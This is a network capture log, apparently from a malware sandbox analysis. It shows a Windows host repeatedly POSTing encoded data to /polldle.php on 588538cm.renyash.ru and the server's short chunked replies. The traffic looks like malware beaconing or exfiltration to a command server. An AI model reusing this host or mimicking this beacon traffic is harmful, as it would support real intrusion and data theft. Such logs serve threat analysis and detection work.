                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eSfQN7K8wz3GcJfOArGNOWAMkrtiMDKRDDZg6dne3DNmOS7zd%2FGwzH0Vd5w6rUZLifG56y%2FvTboPdX65FVB25UX6Gg%2FaZtw%2BJ3ktnjNfqnATkPxWd%2FWNbCbGeMTUAo4JV33l4Nm8"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f52ca7843bc-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2277&min_rtt=2265&rtt_var=858&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1939&delivery_rate=644591&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 39 38 0d 0a 0e 11 2d 0f 33 1a 0a 5a 29 07 33 5e 39 28 3f 5b 2d 22 2f 02 3d 57 3a 17 23 07 3b 05 27 22 34 57 28 14 2a 1d 3f 3a 09 56 20 3e 00 1f 25 29 23 46 0c 1d 22 5d 29 59 33 08 26 3f 37 04 3f 1d 2a 10 31 0c 24 44 3e 1d 3f 56 29 14 29 1b 21 2c 08 53 28 22 29 56 3d 1c 35 04 2c 31 23 5a 31 3a 2e 51 0f 16 21 50 23 22 3b 05 23 3e 20 01 26 1e 2c 00 29 24 3f 05 24 2a 2c 57 2a 23 2a 10 3c 1c 33 09 27 2e 3c 0c 26 11 3d 07 3c 2a 34 0a 3f 01 24 5c 23 0f 28 56 05 3f 5b 4d 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 98-3Z)3^9(?[-"/=W:#;'"4W(*?:V >%)#F"])Y3&?7?*1$D>?V))!,S(")V=5,1#Z1:.Q!P#";#> &,)$?$*,W*#*<3'.<&=<*4?$\#(V?[M0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                94 | 192.168.2.4 | 50102 | 104.21.38.84 | 80
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:34:06.880975008 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:07.239319086 CET | 2504 | OUT | Data Raw: 5d 59 54 56 5f 41 5f 5c 54 5d 55 5a 50 5a 59 5e 50 51 5a 58 57 52 50 58 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]YTV_A_\T]UZPZY^PQZXWRPX[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#-#:1('225X'Y64Z:8+ )/7U&..]5T'?%#X'/\/<
                                                                                Jan 11, 2025 23:34:07.326798916 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:07.598644972 CET | 805 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:07 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7v8xuuj9CoKRXeMoCJricpORiVEIYCySC6PHVhT6Xy8BPnBgHITU4wL0DppJH12Ogg8qXt7zB27Cue7gX3K%2BjbZ9KH8exXv%2FNlHJ5wIGEV3tL%2Bf9P9l7wfqOYhtXqyyOa7JKH9Ew"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f538a41efa3-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2589&min_rtt=1990&rtt_var=1945&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=215148&cwnd=121&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port
                                                                                95  192.168.2.4  50103  104.21.38.84  80
                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                Jan 11, 2025 23:34:07.727901936 CET  295  OUT  POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Jan 11, 2025 23:34:08.083079100 CET2504OUTData Raw: 58 5d 51 50 5a 40 5f 5a 54 5d 55 5a 50 5f 59 50 50 53 5a 5a 57 5c 50 59 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X]QPZ@_ZT]UZP_YPPSZZW\PY[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#:U%1#11!3!7,;<T$#9.B<]!!<?%#X'/\/(
                                                                                Jan 11, 2025 23:34:08.191127062 CET  25  IN  HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:08.360094070 CET  802  IN  HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:08 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9T2%2Fyt62EXFnhwNA%2FVyrN3ytlY63k20C21rMMJv8jexzAiHnZcwdWGELfUpDLfnGyElnVBGCYEW2AivD3Oof2Xk2h3%2FqLN5vgdZSF9N%2F99VYvaoP0aJjNbrTOlip7gBefPPxFZhb"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f58e8748c84-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=7990&min_rtt=1970&rtt_var=12779&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2799&delivery_rate=29121&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a
                                                                                Data Ascii: 4<YW[
                                                                                Jan 11, 2025 23:34:08.450448036 CET  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port
                                                                                96  192.168.2.4  50104  104.21.38.84  80
                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                Jan 11, 2025 23:34:08.568300962 CET  295  OUT  POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Jan 11, 2025 23:34:08.926882029 CET2504OUTData Raw: 58 5d 54 57 5f 44 5a 5e 54 5d 55 5a 50 54 59 51 50 56 5a 5b 57 54 50 59 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X]TW_DZ^T]UZPTYQPVZ[WTPY[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU ..@$8(&"='?R4?=;,+4$3-<^#1$(%#X'/\/
                                                                                Jan 11, 2025 23:34:09.020927906 CET  25  IN  HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:09.208379984 CET  815  IN  HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:09 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yzFv6NCuqbIt1I3zvl1Zj%2FEW5PK5TJ%2BdJdC49if%2FFInzIS67%2BSo0SBUEFbW312ke93Poq8RZO1rB%2FTrjMXSIBqwhOBJ%2FfqkspP5L4HDa3Lp0tJRulxojSdzhPtyU8ro1%2FxEtd%2FdS"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f5e19a172b9-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3062&min_rtt=2008&rtt_var=2862&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2799&delivery_rate=139753&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port
                                                                                97  192.168.2.4  50105  104.21.38.84  80
                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                Jan 11, 2025 23:34:09.335218906 CET  295  OUT  POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Jan 11, 2025 23:34:09.692363977 CET2504OUTData Raw: 5d 5c 54 56 5a 46 5a 5c 54 5d 55 5a 50 5f 59 51 50 52 5a 5f 57 50 50 59 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]\TVZFZ\T]UZP_YQPRZ_WPPY[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU 902@2; &1631 /*8[??7W%U--'8^!1,*%#X'/\/(
                                                                                Jan 11, 2025 23:34:09.779334068 CET  25  IN  HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:10.019345045 CET  805  IN  HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:09 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RP%2FENzk4qWMExFfGFHACzjG96mKUwlbgA5MniA3Ql6eBJ0bCJ1oE3o662jk4zvFlTa8VjYnOAhYUAPMNiEm7VaZnO41fmq%2F4uLLT8lLzWmJk35PR2O3tgMC4nbvg6lZ%2FHqPgguTw"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f62db6f0cc4-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2493&min_rtt=1736&rtt_var=2165&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2799&delivery_rate=187347&cwnd=146&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port
                                                                                98  192.168.2.4  50106  104.21.38.84  80
                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                Jan 11, 2025 23:34:10.147157907 CET  319  OUT  POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:10.505021095 CET2504OUTData Raw: 58 5b 51 50 5a 44 5a 51 54 5d 55 5a 50 5e 59 50 50 56 5a 58 57 53 50 59 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X[QPZDZQT]UZP^YPPVZXWSPY[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#@:"E2^,X120/)#688?Y+Y01 2T:B$\!T'(5#X'/\/,
                                                                                Jan 11, 2025 23:34:10.588177919 CET  25  IN  HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:10.867408037 CET  803  IN  HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:10 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kLmD9LpV69wMgWGvhTxQoqwiNNJKHS7MJy4z0fdD2fErBrmY2j6hc9mZ6oqjbNhkU6r46zCAFjI8acvIYeOPUG58r0vHQ2izc%2BX4X9DKFk1kNbZ88apbDnEobl8tkkj6akxqk%2FDu"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f67ec1442a7-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2776&min_rtt=1751&rtt_var=2706&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=146718&cwnd=203&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port
                                                                                99  192.168.2.4  50107  104.21.38.84  80
                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                Jan 11, 2025 23:34:10.990305901 CET  319  OUT  POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:11.349616051 CET2504OUTData Raw: 58 59 54 51 5a 42 5f 5d 54 5d 55 5a 50 55 59 5d 50 56 5a 53 57 51 50 5d 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XYTQZB_]T]UZPUY]PVZSWQP][\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#9#:%%23?1W#,%Y,;)/%3&-'?"1'+#X'/\/
                                                                                Jan 11, 2025 23:34:11.461920023 CET  25  IN  HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:11.700800896 CET  801  IN  HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:11 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uwddRv0Bi4vA0QkySG0vz9vWCp62igZYkJcCPXw6CRYXuWnUHbPw%2BlOWUqc8jOFevYyBxp%2BBNIPtzijRKOP%2FHzq3er3T4%2F9Mt9F8xNsCnCJYkzTfEXZLQJd0vgWXFCTv300AmXsg"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f6d596c41a3-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3360&min_rtt=1661&rtt_var=4021&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=95706&cwnd=161&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a
                                                                                Data Ascii: 4<YW[
                                                                                Jan 11, 2025 23:34:11.793082952 CET  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port
                                                                                100  192.168.2.4  50108  104.21.38.84  80
                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                Jan 11, 2025 23:34:11.915344954 CET  319  OUT  POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:12.270737886 CET2504OUTData Raw: 5d 59 51 50 5a 48 5a 58 54 5d 55 5a 50 54 59 5b 50 50 5a 59 57 51 50 56 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]YQPZHZXT]UZPTY[PPZYWQPV[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#F-06A%(Y26%,*4Z8;<?&.-$36;Z+5#X'/\/
                                                                                Jan 11, 2025 23:34:12.372884035 CET  25  IN  HTTP/1.1 100 Continue


                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port
                                                                                101  192.168.2.4  50109  104.21.38.84  80
                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                Jan 11, 2025 23:34:12.463926077 CET  319  OUT  POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 1620
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:12.817418098 CET1620OUTData Raw: 58 51 54 55 5a 45 5f 5a 54 5d 55 5a 50 5a 59 58 50 54 5a 5b 57 5d 50 5c 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XQTUZE_ZT]UZPZYXPTZ[W]P\[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#9 *E&$X15'.7%Y,+Z<+S%-.B;!2;(%#X'/\/<
                                                                                Jan 11, 2025 23:34:12.917025089 CET  25  IN  HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:13.074856997 CET  955  IN  HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:13 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fRGC1AwZcJm%2BDadDERgfE2hpsLYXOdain18THDJ8U%2B59kBM6gNqtlm8756okK6tn97sPBQvIi5nEM%2FxzbCftgzD0%2BilZFIu523Oyjs23YGVvQXZQqp2rydxlU4rxOlDMIDplfdXs"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f767eff7ca6-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4929&min_rtt=2015&rtt_var=6584&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1939&delivery_rate=57639&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 39 38 0d 0a 0e 11 2e 54 26 27 3f 01 3d 07 0a 07 2d 5e 3b 5c 2e 0f 0a 10 3e 0f 22 5f 20 29 12 11 25 21 38 1a 3c 2a 04 1d 3f 04 33 12 37 3d 31 0d 26 13 23 46 0c 1d 22 59 2a 2c 3f 08 32 05 38 10 2b 20 32 5d 26 1c 02 07 2a 0a 28 0f 2a 2a 3a 05 21 3c 04 16 3c 1c 21 50 2a 1b 29 03 2f 1f 3b 58 31 2a 2e 51 0f 16 21 1c 21 31 38 15 22 3e 38 07 31 09 33 5f 2b 1d 3f 01 24 2a 38 51 28 20 22 12 2b 32 24 1f 27 5b 33 57 32 3f 26 19 3f 00 20 08 3f 11 24 5c 23 0f 28 56 05 3f 5b 4d 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 98.T&'?=-^;\.>"_ )%!8<*?37=1&#F"Y*,?28+ 2]&*(**:!<<!P*)/;X1*.Q!!18">813_+?$*8Q( "+2$'[3W2?&? ?$\#(V?[M0


                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port
                                                                                102  192.168.2.4  50110  104.21.38.84  80
                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                Jan 11, 2025 23:34:12.586476088 CET  319  OUT  POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2500
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:12.942348003 CET2500OUTData Raw: 5d 59 51 52 5a 48 5a 50 54 5d 55 5a 50 5c 59 50 50 53 5a 5c 57 5c 50 5b 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]YQRZHZPT]UZP\YPPSZ\W\P[[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#-3%+8Z&1=',%7/5^,+)</1 2.$8"2;+#X'/\/
                                                                                Jan 11, 2025 23:34:13.055335045 CET  25  IN  HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:13.289153099 CET  808  IN  HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:13 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NjGFH00e67%2FAzj6b8n%2BGHbmQPDPnarFCGX7UueOwtFz9tTXwI9RVaPyaIGP3wthpy4crlllu2yxI%2FSMtEC9nkiEGXcOEQmLzbNFfk7jHe7QlPDx%2FEeIL7L%2Bin1gA1E8b1bDi9AHN"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f774c328c39-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4050&min_rtt=1995&rtt_var=4858&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2819&delivery_rate=79192&cwnd=189&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


Session ID | Source IP | Source Port | Destination IP | Destination Port
103 | 192.168.2.4 | 50111 | 104.21.38.84 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 23:34:13.416649103 CET | 295 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
Jan 11, 2025 23:34:14.671246052 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 23:34:14.671380997 CET | 25 | IN | HTTP/1.1 100 Continue
